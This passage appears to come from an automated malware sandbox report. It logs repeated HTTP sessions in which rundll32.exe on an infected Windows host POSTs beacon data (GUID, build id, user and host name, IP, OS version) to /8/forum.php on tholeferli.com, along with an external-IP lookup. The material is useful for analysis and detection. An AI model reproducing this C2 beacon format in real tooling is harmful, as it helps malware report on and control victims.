                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:23.318594933 CEST333INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:23 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 56 45 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGVETARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                35192.168.2.2249202194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:23.593628883 CEST334OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:23.762403965 CEST335INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:23 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZMNAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                36192.168.2.2249203194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:24.041052103 CEST335OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:24.211648941 CEST336INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:24 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 43 58 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFCXUARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                37192.168.2.2249204194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:24.500588894 CEST336OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:24.672410011 CEST337INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:24 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 41 5a 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJAZQARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                38192.168.2.2249205194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:24.952299118 CEST338OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:25.108439922 CEST338INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:24 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGZATARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                39192.168.2.2249206194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:25.390419006 CEST339OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:25.547324896 CEST339INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:25 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 43 4b 50 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cCKPXARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.224917150.16.239.6580C:\Windows\SysWOW64\svchost.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:06.081828117 CEST293OUTGET /?format=xml HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
                                                Jul 22, 2021 16:11:06.266412020 CEST295INHTTP/1.1 200 OK
                                                Server: Cowboy
                                                Connection: keep-alive
                                                Content-Type: text/plain
                                                Vary: Origin
                                                Date: Thu, 22 Jul 2021 14:11:06 GMT
                                                Content-Length: 10
                                                Via: 1.1 vegur
                                                Data Raw: 38 34 2e 31 37 2e 35 32 2e 38
                                                Data Ascii: 84.17.52.8


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                40192.168.2.2249207194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:25.845089912 CEST340OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:26.011414051 CEST340INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:25 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 48 53 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJHSQARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                41192.168.2.2249208194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:26.291963100 CEST341OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:26.458389997 CEST341INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:26 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 42 59 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGBYTARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                42192.168.2.2249209194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:26.742439032 CEST342OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:26.898808002 CEST342INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:26 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 56 4a 51 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cVJQEARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                43192.168.2.2249210194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:27.191701889 CEST343OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:27.347398996 CEST344INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:27 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 47 54 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJGTQARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                44192.168.2.2249211194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:27.621886015 CEST344OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:27.777520895 CEST345INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:27 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZZAAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                45192.168.2.2249212194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:28.069185972 CEST345OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:28.217291117 CEST346INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:28 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 4a 51 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBJQYARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                46192.168.2.2249213194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:28.501733065 CEST347OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:28.671717882 CEST347INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:28 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 54 47 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGTGTARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                47192.168.2.2249214194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:28.951314926 CEST348OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:29.115489960 CEST348INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:28 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 47 54 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFGTUARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                48192.168.2.2249215194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:29.400058031 CEST349OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:29.557709932 CEST349INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:29 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 4b 50 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYKPBARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                49192.168.2.2249216194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:29.838335991 CEST350OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:29.991446972 CEST350INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:29 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 4d 4e 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNMNMARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.2249172194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:06.085464954 CEST294OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:06.253609896 CEST294INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:06 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 4e 4d 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQNMJARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                50192.168.2.2249217194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:30.272991896 CEST351OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
